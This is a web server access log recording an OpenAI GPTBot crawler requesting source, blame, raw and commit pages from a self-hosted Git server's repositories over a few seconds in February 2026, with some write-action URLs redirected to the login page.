"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14258] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16133] [Gzip 5.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2factivate.csh" [Client 74.7.227.38] [Length 25043] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:16:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html?display=source" [Client 74.7.227.38] [Length 30977] [Gzip 9.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" +[17/Feb/2026:16:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13540] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" +[17/Feb/2026:16:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13541] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" +[17/Feb/2026:16:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13542] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" +[17/Feb/2026:16:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11211] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" +[17/Feb/2026:16:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" +[17/Feb/2026:16:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" +[17/Feb/2026:16:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10210] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13558] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15173] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10211] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10210] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10161] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build" [Client 74.7.227.38] [Length 10090] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:16:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 9948] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:15:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/package.json" +[17/Feb/2026:16:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/package.json" +[17/Feb/2026:16:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=HTML&q=&sort=recentupdate" [Client 74.7.227.38] [Length 6303] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:16:15:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/metadata.json" +[17/Feb/2026:16:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/metadata.json" +[17/Feb/2026:16:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=Roff&q=&sort=recentupdate" [Client 74.7.227.38] [Length 6305] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:16:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html" [Client 74.7.227.38] [Length 39779] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:15:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build" +[17/Feb/2026:16:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build" +[17/Feb/2026:16:15:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build" +[17/Feb/2026:16:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol/build" +[17/Feb/2026:16:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build" [Client 74.7.227.38] [Length 9830] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build" +[17/Feb/2026:16:15:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build" +[17/Feb/2026:16:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build" +[17/Feb/2026:16:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11562] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode" +[17/Feb/2026:16:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11562] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode" +[17/Feb/2026:16:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11562] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode" +[17/Feb/2026:16:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11562] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode" +[17/Feb/2026:16:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" +[17/Feb/2026:16:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21349] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 